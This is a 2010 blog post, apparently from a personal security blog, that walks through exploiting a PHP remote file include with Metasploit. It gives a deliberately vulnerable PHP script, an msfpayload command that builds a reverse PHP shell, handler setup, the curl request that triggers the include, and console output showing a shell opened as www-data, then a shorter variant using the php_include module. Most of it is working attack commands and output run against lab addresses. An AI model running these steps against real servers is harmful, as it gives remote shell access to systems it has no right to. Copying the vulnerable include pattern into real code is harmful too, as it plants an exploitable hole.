Monday, January 11, 2010

Using Metasploit PHP Payloads with remote file includes

Not completely sure how useful this would be to anyone as it's probably already been well documented but I just realized I could do it and thought I might share.

First off, find yourself a php script with a remote file include.  For this example, I created one:

include_test.php:


<html>
        <body>
                <? require $_GET['include'] ?>
        </body>
</html>


Next, generate your php payload for this use:
./msfpayload php/reverse_php LHOST=172.16.119.137 R > /var/www/include.php.txt

This just generates a reverse connect php script.  I also had to edit the file and enclose it in tags.  Also, you can see that I placed it in my web servers root directory so that it's now publicly accessible.

Next up, start up your metasploit console and handler:

msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD php/reverse_php
PAYLOAD => php/reverse_php
msf exploit(handler) > set LHOST 172.16.119.137
LHOST => 172.16.119.137
msf exploit(handler) > exploit

[*] Starting the payload handler...
[*] Started reverse handler on port 4444


Finally, access the url to fire the remote file include:
curl 'http://172.16.119.136/apache2-default/include_test.php?include=http://172.16.119.137/include.php.txt'

And have fun:

[*] Command shell session 1 opened (172.16.119.137:4444 -> 172.16.119.136:32803)

id
uid=33(www-data) gid=33(www-data) groups=33(www-data)



Update: @egyp7 on twitter was awesome enough to point out all of this could be simplified to:


msf > use exploit/unix/webapp/php_include          
msf exploit(php_include) > set PAYLOAD php/reverse_php
PAYLOAD => php/reverse_php
msf exploit(php_include) > set PHPURI /apache2-default/include_test.php?include=!URL!  
PHPURI => /apache2-default/include_test.php?include=!URL!
msf exploit(php_include) > set RHOST 172.16.119.136
RHOST => 172.16.119.136
msf exploit(php_include) > set LHOST 172.16.119.137
LHOST => 172.16.119.137
msf exploit(php_include) > exploit

[*] Started reverse handler on port 4444
[*] Using URL: http://0.0.0.0:8080/siI1CLOjhRpr0DS
[*]  Local IP: http://172.16.119.137:8080/siI1CLOjhRpr0DS
[*] PHP include server started.
[*] Trying uri /apache2-default/include_test.php?include=%68%74%74%70%3a%2f%2f%31%37%32%2e%31%36%2e%31%31%39%2e%31%33%37%3a%38%30%38%30%2f%73%69%49%31%43%4c%4f%6a%68%52%70%72%30%44%53%3f
[*] Command shell session 1 opened (172.16.119.137:4444 -> 172.16.119.136:32823)
id

uid=33(www-data) gid=33(www-data) groups=33(www-data)



Posted by at No comments:
Subscribe to: Posts (Atom)